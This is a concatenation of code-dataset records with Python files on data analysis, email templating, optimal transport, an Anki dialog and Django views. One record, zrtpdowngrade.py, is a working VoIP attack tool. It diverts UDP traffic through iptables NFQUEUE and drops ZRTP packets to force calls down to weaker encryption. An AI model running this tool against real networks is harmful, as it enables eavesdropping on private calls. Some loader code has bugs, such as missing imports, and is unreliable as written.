"collections.namedtuple", "line_number": 20, "usage_type": "call"}, {"api_name": "lxml.html.fromstring", "line_number": 32, "usage_type": "call"}, {"api_name": "lxml.html", "line_number": 32, "usage_type": "attribute"}, {"api_name": "odoo.models.TransientModel", "line_number": 46, "usage_type": "attribute"}, {"api_name": "odoo.models", "line_number": 46, "usage_type": "name"}, {"api_name": "odoo.api.model", "line_number": 75, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 75, "usage_type": "name"}, {"api_name": "odoo.models.TransientModel", "line_number": 125, "usage_type": "attribute"}, {"api_name": "odoo.models", "line_number": 125, "usage_type": "name"}, {"api_name": "odoo.api.model", "line_number": 131, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 131, "usage_type": "name"}]} +{"seq_id": "457698418", "text": "#!/usr/bin/env python3\n\nimport sys\nimport argparse\nimport subprocess\nfrom netfilterqueue import NetfilterQueue\n\n\nparser = argparse.ArgumentParser(\n description=\"A tool to downgrade ZRTP media stream to RTP, SRTP-SDES or SRTP-DTLS. Its vendor and configuration specific, which protocol will be used after downgrade.\"\n)\n\nparser.add_argument(\n '-i',\n dest=\"INTERFACE\",\n type=str,\n help=\"The interface on which the tool will listen on. If no interface is set, the tool will listen on all interfaces\"\n)\n\nparser.add_argument(\n '-v',\n action='store_true',\n help=\"Verbose mode\"\n)\n\nargs = parser.parse_args()\n\n\ndef check_payload(pkt):\n\n payload = pkt.get_payload()\n\n if b'\\x5a\\x52\\x54\\x50' in payload:\n print(\"\\033[1;32m[+]\\033[0m ZRTP packet seen and dropped for downgrade\")\n pkt.drop()\n\n else:\n if args.v:\n print(\n \"\\033[1;34m[*]\\033[0m Packet received, but it doesn't seems to be ZRTP\")\n\n pkt.accept()\n\n\ndef iptables():\n\n if args.INTERFACE:\n cmd = f\"iptables -I INPUT -p udp -j NFQUEUE --queue-num 1 -i {args.INTERFACE}\".split()\n subprocess.run(cmd, shell=False)\n cmd = f\"iptables -I FORWARD -p udp -j NFQUEUE --queue-num 1 -i {args.INTERFACE}\".split()\n subprocess.run(cmd, shell=False)\n\n else:\n cmd = \"iptables -I INPUT -p udp -j NFQUEUE --queue-num 1\".split()\n subprocess.run(cmd, shell=False)\n cmd = \"iptables -I FORWARD -p udp -j NFQUEUE --queue-num 1\".split()\n subprocess.run(cmd, shell=False)\n\n\nnfqueue = NetfilterQueue()\nnfqueue.bind(1, check_payload)\n\niptables()\n\nprint(\"\\033[1;34m[*]\\033[0m Start listening for incoming UDP packets ...\")\nprint(\"\")\n\ntry:\n nfqueue.run()\n\nexcept KeyboardInterrupt:\n cmd = \"iptables -D INPUT 1\".split()\n subprocess.run(cmd, shell=False)\n cmd = \"iptables -D FORWARD 1\".split()\n subprocess.run(cmd, shell=False)\n print('')\n\n", "sub_path": "tools/ZRTPDowngrade/zrtpdowngrade.py", "file_name": "zrtpdowngrade.py", "file_ext": "py", "file_size_in_byte": 1922, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 9, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 49, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 51, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 55, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 57, "usage_type": "call"}, {"api_name": "netfilterqueue.NetfilterQueue", "line_number": 60, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 73, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 75, "usage_type": "call"}]} +{"seq_id": "566417538", "text": "# This file contains miscellaneous helper functions and constants for the \n# covid_cogntition.py analysis script. I've palced these items in here to \n# increase readiability of the main script.\n#\ndef remove_unused_categories(df):\n\t\"\"\" Helper function to remove unused categories from all categorical columns\n\t\tin a dataframe. For use in chained pipelines.\n\t\"\"\"\n\tfor col in df.select_dtypes('category').columns:\n\t\tdf[col] = df[col].cat.remove_unused_categories()\n\treturn df\n\n# This a global variable that will track the data sample N though a\n# preprocessing pipeline.\nnprev = 0\n\ndef report_N(df, label='', reset_count=False):\n\t\"\"\" Helper function to report the size of a dataframe in a pipeline chain.\n\t\tOptionally, will print a label. Useful for logging/debugging. If \n\t\treset_count is true, then the global counter (used to calculate change\n\t\tin sample size) is reset to zero.\n\t\"\"\"\n\tglobal nprev\n\tif reset_count:\n\t\tnprev = 0\n\tncurrent = df.shape[0]\n\tdelta = ncurrent - nprev\n\tprint(f\"N = {ncurrent:5d}, {delta:+6d} ({label})\")\n\tnprev = df.shape[0]\n\treturn df\n\ndef set_column_names(df, new_names):\n\t\"\"\" Another helper function that sets the columns of a dataframe to the \n\t\tsupplied new names (a list-like of names).\n\t\"\"\"\n\tdf.columns = new_names\n\treturn df\n\nfrom IPython.display import SVG, display\nfrom os import path\ndef save_and_display_figure(figure, file_name):\n\t\"\"\" Save images in SVG format (for editing/manuscript) then display inside\n\t\tthe notebook. Avoids having to have multiple versions of the image, or \n\t\tmultiple ways of displaying images from plotly, etc.\n\t\"\"\"\n\tfull_file_name = path.join('.', 'images', f\"{file_name}.svg\")\n\tfigure.write_image(full_file_name)\n\tdisplay(SVG(full_file_name))\n\ndef pval_format(p):\n\t\"\"\" Formatter for p-values in tables.\n\t\"\"\"\n\tif p < 0.001:\n\t\treturn \"< 0.001\"\n\telse:\n\t\treturn f\"{p:.03f}\"\n\ndef bf_format(bf):\n\t\"\"\" Formatter for Bayes Factors in tables.\n\t\"\"\"\n\tif isinstance(bf, str):\n\t\tbf = float(bf)\n\tif bf > 1000:\n\t\treturn \"> 1000\"\n\telse:\n\t\treturn f\"{bf:.02f}\"\n\ndef ci_format(ci, precision=3):\n\t\"\"\" Formatter for confidence intervals, where ci is a 2-element array.\n\t\"\"\"\n\treturn f\"({ci[0]:.{precision}f}, {ci[1]:.{precision}f})\"\n\ndef styled_df(df, return_it=False):\n\t\"\"\" Styles a dataframe (df) for display.\n\t\"\"\"\n\tstyled_table = df.style.format(table_style)\n\tdisplay(styled_table)\n\tif return_it:\n\t\treturn styled_table\n\ndef save_and_display_table(df, fn):\n\t\"\"\" Styles a dataframe according to the rules below, and saves it as a \n\t\t.html file. Saving as .html so it's as close as possible to the final\n\t\tmanuscript format. Still haven't found a better way to do this...\n\t\"\"\"\n\twith open(f\"./tables/{fn}.html\", 'w') as wf:\n\t\twf.write(styled_df(df, return_it=True).render())\n\ntable_style = {\n\t'B': '{:.2f}',\n\t'tstat': '{:.2f}',\n\t'df': '{:.2f}',\n\t'p_adj': pval_format,\n\t'CI': ci_format,\n\t'dR2': '{:.3f}',\n\t'f2': '{:.3f}',\n\t'd': '{:.2f}',\n\t'BF10': bf_format,\n}", "sub_path": "covid_cognition/lib_utils.py", "file_name": "lib_utils.py", "file_ext": "py", "file_size_in_byte": 2899, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path", "line_number": 46, "usage_type": "name"}, {"api_name": "IPython.display.display", "line_number": 48, "usage_type": "call"}, {"api_name": "IPython.display.SVG", "line_number": 48, "usage_type": "call"}, {"api_name": "IPython.display.display", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "277719547", "text": "#!/usr/bin/env python\n\n# Create the \"largest club\" and \"most new members\" CSVs\n\nimport dbconn, tmutil, sys, os\n\n\ndef inform(*args, **kwargs):\n \"\"\" Print information to 'file' unless suppressed by the -quiet option.\n suppress is the minimum number of 'quiet's that need be specified for\n this message NOT to be printed. \"\"\"\n suppress = kwargs.get('suppress', 1)\n file = kwargs.get('file', sys.stderr)\n \n if parms.quiet < suppress:\n print >> file, ' '.join(args)\n\n### Insert classes and functions here. The main program begins in the \"if\" statement below.\n\nif __name__ == \"__main__\":\n \n import tmparms, argparse\n # Make it easy to run under TextMate\n if 'TM_DIRECTORY' in os.environ:\n os.chdir(os.path.join(os.environ['TM_DIRECTORY'],'data'))\n \n reload(sys).setdefaultencoding('utf8')\n \n # Handle parameters\n parms = tmparms.tmparms()\n parms.add_argument('--quiet', '-q', action='count')\n parms.add_argument('--netfile', default='netadd.csv', dest='netfile', type=argparse.FileType('w'), help=\"CSV file: net new members\")\n parms.add_argument('--bigfile', default='bigclubs.csv', dest='bigfile', type=argparse.FileType('w'), help=\"CSV file: active members\")\n # Add other parameters here\n parms.parse() \n \n # Connect to the database \n conn = dbconn.dbconn(parms.dbhost, parms.dbuser, parms.dbpass, parms.dbname)\n curs = conn.cursor()\n \n # Main program begins here.\n\n # First, deal with net adds\n # Get the top ten (with ties)\n parms.netfile.write('Club Name,Members Added\\n')\n curs.execute(\"select clubname, activemembers - membase as net from clubperf where entrytype = 'L' having net > 0 and net >= (select min(net) from (select activemembers - membase as net from clubperf where entrytype = 'L' order by net desc limit 10) m) order by net desc, clubname\")\n for l in curs.fetchall():\n parms.netfile.write('%s, %d\\n' % (l[0].replace(',',';'), l[1]))\n parms.netfile.close()\n \n # And now, the biggest clubs\n parms.bigfile.write('Club Name,Active Members\\n')\n curs.execute(\"select clubname, activemembers from clubperf where entrytype = 'L' having activemembers >= (select min(activemembers) from (select activemembers from clubperf where entrytype = 'L' order by activemembers desc limit 10) m) order by activemembers desc, clubname\")\n for l in curs.fetchall():\n parms.bigfile.write('%s, %d\\n' % (l[0].replace(',',';'), l[1]))\n parms.bigfile.close() \n \n # And that's it.\n", "sub_path": "clubsizes.py", "file_name": "clubsizes.py", "file_ext": "py", "file_size_in_byte": 2542, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "sys.stderr", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 25, "usage_type": "attribute"}, {"api_name": "tmparms.tmparms", "line_number": 30, "usage_type": "call"}, {"api_name": "argparse.FileType", "line_number": 32, "usage_type": "call"}, {"api_name": "argparse.FileType", "line_number": 33, "usage_type": "call"}, {"api_name": "dbconn.dbconn", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "194731040", "text": "from aqt import mw\r\nfrom aqt.qt import *\r\nfrom .ui import QHSeparationLine\r\n\r\nclass DlgConfig(QDialog):\r\n def __init__(self, config):\r\n super(DlgConfig, self).__init__(mw)\r\n self.setWindowTitle('Audio Files')\r\n self.setWindowFlags(Qt.Dialog)\r\n\r\n self._dir = QLineEdit()\r\n self._dir.setText(config['dir'] if 'dir' in config else '')\r\n self._dir.textChanged.connect(lambda v: self._setConfigValue(config, 'dir', v))\r\n self._dir.setToolTip('directory to copy sound data to')\r\n\r\n self._random = QComboBox()\r\n self._random.addItem('use field text', None)\r\n self._random.addItem('random', 'random')\r\n self._random.setCurrentIndex(1 if 'filenames' in config and config['filenames'].lower() == 'random' else 0)\r\n self._random.currentTextChanged.connect(lambda v: self._setConfigValue(config, 'filenames', v))\r\n\r\n self._use_selection = QCheckBox()\r\n self._use_selection.setText('search using selected text?')\r\n self._use_selection.setChecked(config['use_selection'] if 'use_selection' in config else False)\r\n self._use_selection.toggled.connect(lambda v: self._setConfigValue(config, 'use_selection', v))\r\n\r\n buttonBox = QDialogButtonBox(QDialogButtonBox.Ok | QDialogButtonBox.Cancel)\r\n buttonBox.accepted.connect(self.accept)\r\n buttonBox.rejected.connect(self.reject)\r\n\r\n layout = QGridLayout()\r\n layout.addWidget(QLabel('Copy to: '), 0, 0)\r\n layout.addWidget(self._dir, 0, 1, 1, 2)\r\n layout.addWidget(QLabel('Filenames: '), 1, 0)\r\n layout.addWidget(self._random, 1, 1, 1, 2)\r\n layout.addWidget(self._use_selection, 2, 1, 1, 2)\r\n\r\n row = 3\r\n for name in config['sources']:\r\n row = self._addSourceConfig(layout, row, name, config['sources'][name])\r\n \r\n layout.addWidget(QHSeparationLine(), row, 0, 1, 3)\r\n layout.addWidget(buttonBox, row + 1, 0, 1, 3)\r\n self.setLayout(layout)\r\n\r\n def _addSourceConfig(self, layout, row, name, config):\r\n enabled = QCheckBox()\r\n enabled.setChecked(config['enabled'])\r\n enabled.toggled.connect(lambda v: self._setConfigValue(config, 'enabled', v))\r\n\r\n layout.addWidget(QHSeparationLine(), row, 0, 1, 3)\r\n row = row + 1\r\n layout.addWidget(QLabel(name), row, 0)\r\n layout.addWidget(QLabel('enabled?'), row, 1)\r\n layout.addWidget(enabled, row, 2)\r\n row = row + 1\r\n for key in config.keys():\r\n if key != 'enabled':\r\n attribute = QLineEdit()\r\n attribute.setText(config[key])\r\n attribute.textChanged.connect(lambda v: self._setConfigValue(config, key, v))\r\n\r\n layout.addWidget(QLabel(key), row, 1)\r\n layout.addWidget(attribute, row, 2)\r\n row = row + 1\r\n return row\r\n\r\n def _setConfigValue(self, config, key, value):\r\n config[key] = value\r\n", "sub_path": "audiofiles/src/main/python/dlgconfig.py", "file_name": "dlgconfig.py", "file_ext": "py", "file_size_in_byte": 2977, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "aqt.mw", "line_number": 7, "usage_type": "argument"}, {"api_name": "ui.QHSeparationLine", "line_number": 42, "usage_type": "call"}, {"api_name": "ui.QHSeparationLine", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "187535046", "text": "# encoding: utf-8\nfrom __future__ import unicode_literals\nimport logging\nfrom os import path\nfrom zipfile import ZipFile\n\nfrom emails.compat import to_unicode, string_types\n\n# FileSystemLoader adapted from jinja2.loaders\n\nclass FileNotFound(Exception):\n pass\n\ndef split_template_path(template):\n \"\"\"Split a path into segments and perform a sanity check. If it detects\n '..' in the path it will raise a `TemplateNotFound` error.\n \"\"\"\n pieces = []\n for piece in template.split('/'):\n if path.sep in piece \\\n or (path.altsep and path.altsep in piece) or \\\n piece == path.pardir:\n raise FileNotFound(template)\n elif piece and piece != '.':\n pieces.append(piece)\n return pieces\n\ndef open_if_exists(filename, mode='rb'):\n \"\"\"Returns a file descriptor for the filename if that file exists,\n otherwise `None`.\n \"\"\"\n try:\n return open(filename, mode)\n except IOError as e:\n if e.errno not in (errno.ENOENT, errno.EISDIR):\n raise\n\n\nclass BaseLoader(object):\n\n def __getitem__(self, filename):\n try:\n contents, _ = self.get_source(filename)\n return contents\n except FileNotFound:\n return None\n\n def find_index_file(self, filename=None):\n #print __name__, \"BaseLoader.find_index_file\", filename\n if filename:\n if self[filename]:\n return filename\n else:\n raise FileNotFound(filename)\n\n html_files = []\n index_html = None\n\n for filename in self.list_files():\n\n f = path.basename(filename).lower()\n\n #print __name__, \"BaseLoader.find_index_file\", filename, f\n\n if f.endswith('.htm') or f.endswith('.html'):\n if f.startswith('index.'):\n return filename\n else:\n html_files.append(filename)\n\n if html_files:\n return htmlfiles[0]\n\n raise FileNotFound('index html')\n\n\nclass FileSystemLoader(BaseLoader):\n \"\"\"Loads templates from the file system. This loader can find templates\n in folders on the file system and is the preferred way to load them.\n\n The loader takes the path to the templates as string, or if multiple\n locations are wanted a list of them which is then looked up in the\n given order:\n\n >>> loader = FileSystemLoader('/path/to/templates')\n >>> loader = FileSystemLoader(['/path/to/templates', '/other/path'])\n\n Per default the template encoding is ``'utf-8'`` which can be changed\n by setting the `encoding` parameter to something else.\n \"\"\"\n\n def __init__(self, searchpath, encoding='utf-8', base_path=None):\n if isinstance(searchpath, string_types):\n searchpath = [searchpath]\n self.searchpath = list(searchpath)\n self.encoding = encoding\n self.base_path = base_path\n\n def get_source(self, template):\n\n if self.base_path:\n name = path.join(self.base_path, template)\n\n pieces = split_template_path(template)\n for searchpath in self.searchpath:\n filename = path.join(searchpath, *pieces)\n f = open_if_exists(filename)\n if f is None:\n continue\n try:\n contents = f.read().decode(self.encoding)\n finally:\n f.close()\n\n return contents, filename\n\n raise FileNotFound(template)\n\n def list_files(self):\n found = set()\n for searchpath in self.searchpath:\n for dirpath, dirnames, filenames in os.walk(searchpath):\n for filename in filenames:\n template = os.path.join(dirpath, filename) \\\n [len(searchpath):].strip(os.path.sep) \\\n .replace(os.path.sep, '/')\n if template[:2] == './':\n template = template[2:]\n if template not in found:\n yield template\n\n\n\nclass ZipLoader(BaseLoader):\n\n def __init__(self, file, encoding='utf-8', base_path=None):\n self.zipfile = ZipFile(file, 'r')\n self.encoding = encoding\n self.base_path = base_path\n self.mapping = {}\n self._filenames = None\n\n\n def _decode_zip_filename(self, name):\n for enc in ('cp866', 'cp1251', 'utf-8'):\n try:\n return to_unicode(name, enc)\n except UnicodeDecodeError:\n pass\n return name\n\n\n def _unpack_zip(self):\n if self._filenames is None:\n self._filenames = {}\n for name in self.zipfile.namelist():\n decoded_name = self._decode_zip_filename(name)\n self._filenames[decoded_name] = name\n\n\n def get_source(self, name):\n\n logging.debug('ZipLoader.get_source %s', name)\n\n if self.base_path:\n name = path.join(self.base_path, name)\n logging.debug('ZipLoader.get_source has base_path, result name is %s', name)\n\n self._unpack_zip()\n\n if isinstance(name, str):\n name = to_unicode(name, 'utf-8')\n\n data = self.mapping.get(name, None)\n\n if data is not None:\n return data, name\n\n original_name = self._filenames.get(name)\n\n logging.debug('ZipLoader.get_source original_name=%s', original_name)\n\n if original_name is None:\n raise FileNotFound(name)\n\n data = self.zipfile.read(original_name)\n\n logging.debug('ZipLoader.get_source returns %s bytes', len(data))\n return data, name\n\n\n def list_files(self):\n self._unpack_zip()\n return sorted(self._filenames)\n\n\n", "sub_path": "venv/Lib/site-packages/emails-0.1.12-py2.7.egg/emails/loader/fileloader.py", "file_name": "fileloader.py", "file_ext": "py", "file_size_in_byte": 5738, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "os.path.sep", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 20, "usage_type": "name"}, {"api_name": "os.path.altsep", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 21, "usage_type": "name"}, {"api_name": "os.path.pardir", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 22, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "name"}, {"api_name": "emails.compat.string_types", "line_number": 93, "usage_type": "argument"}, {"api_name": "os.path.join", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path", "line_number": 102, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "name"}, {"api_name": "os.walk", "line_number": 122, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 124, "usage_type": "call"}, {"api_name": "os.path", "line_number": 124, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 125, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 126, "usage_type": "attribute"}, {"api_name": "zipfile.ZipFile", "line_number": 137, "usage_type": "call"}, {"api_name": "emails.compat.to_unicode", "line_number": 147, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 163, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 166, "usage_type": "call"}, {"api_name": "os.path", "line_number": 166, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 167, "usage_type": "call"}, {"api_name": "emails.compat.to_unicode", "line_number": 172, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 181, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 188, "usage_type": "call"}]} +{"seq_id": "175997862", "text": "import numpy as np\nimport tensorflow as tf\nimport cv2\nimport moviepy.editor as mvp\nfrom moviepy.video.io.ffmpeg_writer import FFMPEG_VideoWriter\n# note: conditionally imports networkx\n\nimport sinkhorn\n\n\ndef pairwiseSquaredDistances(clients, servers):\n cL2S = np.sum(clients ** 2, axis=-1)\n sL2S = np.sum(servers ** 2, axis=-1)\n cL2SM = np.tile(cL2S, (len(servers), 1))\n sL2SM = np.tile(sL2S, (len(clients), 1))\n squaredDistances = cL2SM + sL2SM.T - 2.0 * servers.dot(clients.T)\n return np.clip(squaredDistances.T, a_min=0, a_max=None)\n\n\n# Wasserstein_1, that is, L2 rather than squared L2.\ndef optimalMatching(latentPositions, natPositions):\n import networkx as nx\n\n distances = np.sqrt(pairwiseSquaredDistances(latentPositions, natPositions))\n n = distances.shape[0]\n bipartite = nx.Graph()\n bipartite.add_nodes_from(range(n), bipartite=0)\n bipartite.add_nodes_from(range(n, 2*n), bipartite=1)\n for i in range(n):\n for j in range(n):\n bipartite.add_edge(i, n+j, weight=-distances[i, j], near=False)\n matching = nx.algorithms.matching.max_weight_matching(bipartite, maxcardinality=True, weight='weight')\n m2 = [None for _ in range(n)]\n for a, b in matching:\n if a >= n:\n b, a = a, b\n latent_index = a\n nat_index = b - n\n m2[latent_index] = nat_index\n return m2\n\n\ndef grid(a, b):\n x = np.linspace(-1, 1, a)\n y = np.linspace(-1, 1, b)\n X, Y = np.meshgrid(x, y)\n XX = np.array([X.ravel(), Y.ravel()]).T\n return XX.astype(np.float32)\n\n\ndef main():\n n = 1000\n d = 20\n bs = 50\n assert n % bs == 0\n VIDEO_SIZE = 512\n minibatch_rounds = 30 * (n // bs)\n\n # first two coordinates are linearly transformed in an ad hoc way, rest simply multiplied by 2.\n start_np = np.random.normal(size=(n, d)).astype(np.float32)\n start_np *= 2\n start_np[:, 0] += start_np[:, 1]\n start_np += 2\n target_np = np.random.normal(size=(n, d)).astype(np.float32)\n\n one_dim_test = False\n if one_dim_test:\n # the simplest case where convergence to a suboptimal solution can be presented\n # is two 1d grids with different increments.\n start_np = (grid(n, 1) + 1.0) + np.array([-3, 0.0])\n target_np = (grid(n, 1) + 1.0) * 1.9 + np.array([0.0, 0.0]) \n\n assert start_np.shape == target_np.shape == (n, d)\n\n print(np.mean(target_np[:, :4], axis=0), \"\\n\", np.cov(target_np[:, :4].T))\n\n do_initial_matching = False\n do_rematching = False\n\n if do_initial_matching:\n initial_matching = optimalMatching(start_np, target_np)\n target_np = target_np[initial_matching]\n\n with tf.Session() as sess:\n pos = tf.Variable(start_np.astype(np.float32))\n target = tf.constant(target_np.astype(np.float32))\n mask = tf.placeholder(tf.float32, shape=(n, d))\n\n C = sinkhorn.pdist(pos, target) / (0.01) ** 2\n P, f, g = sinkhorn.Sinkhorn(C, n=n, m=n, f=None, epsilon=0.01, niter=10)\n\n # g = tf.matmul(P, target) * n - pos\n # next_pos = pos + 0.1 * g\n OT = tf.reduce_mean(P * C) * n\n\n optimizer = tf.train.AdamOptimizer(learning_rate=0.1)\n # optimizer = tf.train.GradientDescentOptimizer(learning_rate=1.0)\n\n grad_vars = optimizer.compute_gradients(OT)\n masked_gvs = [(mask * grad, var) for grad, var in grad_vars]\n train_step = optimizer.apply_gradients(masked_gvs)\n\n sess.run(tf.global_variables_initializer())\n\n\n with FFMPEG_VideoWriter('out.mp4', (VIDEO_SIZE, VIDEO_SIZE), 30.0) as video:\n for indx in range(minibatch_rounds):\n ids = np.random.choice(n, bs, replace=False)\n mask_np = np.zeros((n, d))\n mask_np[ids, :] = 1\n sess.run(train_step, feed_dict={mask: mask_np})\n\n next_pos_np = sess.run(pos)\n # frame = sinkhorn.draw_points(next_pos_np, VIDEO_SIZE)\n # frame = sinkhorn.draw_edges(next_pos_np[next_pos_np[:, 0].argsort()], target_np[target_np[:, 0].argsort()], VIDEO_SIZE)\n\n if do_rematching:\n matching = optimalMatching(next_pos_np, target_np)\n target_np_aligned = target_np[matching]\n else:\n target_np_aligned = target_np\n\n draw_edges = do_initial_matching or do_rematching\n frame = sinkhorn.draw_edges(next_pos_np, target_np_aligned, VIDEO_SIZE, edges=draw_edges)\n video.write_frame(frame)\n\n print(\"iter:\", indx, \"transport:\", sess.run(OT), \"mean_length_of_matching:\",\n np.mean(np.linalg.norm(next_pos_np - target_np_aligned, axis=1)))\n print(np.mean(next_pos_np[:, :4], axis=0), \"\\n\", np.cov(next_pos_np[:, :4].T))\n\nmain()\n", "sub_path": "sinkhorn_batch_test.py", "file_name": "sinkhorn_batch_test.py", "file_ext": "py", "file_size_in_byte": 4809, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "numpy.sum", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 24, "usage_type": "call"}, {"api_name": "networkx.Graph", "line_number": 26, "usage_type": "call"}, {"api_name": "networkx.algorithms.matching.max_weight_matching", "line_number": 32, "usage_type": "call"}, {"api_name": "networkx.algorithms", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numpy.linspace", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 48, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 60, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 60, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 64, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 64, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.cov", "line_number": 75, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 84, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 85, "usage_type": "attribute"}, {"api_name": "tensorflow.constant", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 86, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 87, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 87, "usage_type": "attribute"}, {"api_name": "sinkhorn.pdist", "line_number": 89, "usage_type": "call"}, {"api_name": "sinkhorn.Sinkhorn", "line_number": 90, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 94, "usage_type": "call"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 96, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 96, "usage_type": "attribute"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 103, "usage_type": "call"}, {"api_name": "moviepy.video.io.ffmpeg_writer.FFMPEG_VideoWriter", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 108, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 109, "usage_type": "call"}, {"api_name": "sinkhorn.draw_edges", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 128, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.cov", "line_number": 129, "usage_type": "call"}]} +{"seq_id": "230720868", "text": "# -*- coding: utf-8 -*-\nfrom django.shortcuts import redirect\nfrom django.conf import settings\nfrom django.http import Http404, HttpResponse\nfrom django.views.generic import TemplateView, FormView\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\n\nfrom mail_factory import factory\n\n\nclass MailListView(TemplateView):\n \"\"\"Return a list of mails.\"\"\"\n template_name = 'mail_factory/list.html'\n\n def get_context_data(self, **kwargs):\n \"\"\"Return object_list.\"\"\"\n data = super(MailListView, self).get_context_data(**kwargs)\n mail_list = []\n \n for mail_name, mail_class in sorted(factory.mail_map.items(), key=lambda x: x[0]):\n mail_list.append((mail_name, mail_class.__name__))\n data['mail_map'] = mail_list\n return data\n\n\nclass MailFormView(FormView):\n template_name = 'mail_factory/form.html'\n\n def dispatch(self, request, mail_name):\n self.mail_name = mail_name\n if self.mail_name not in factory.mail_map:\n raise Http404\n\n self.raw = 'raw' in request.POST\n self.send = 'send' in request.POST\n self.email = request.POST.get('email')\n\n return super(MailFormView, self).dispatch(request)\n\n def get_form_class(self):\n return factory._get_mail_form(self.mail_name)\n\n def form_valid(self, form):\n if self.raw:\n return HttpResponse('
%s
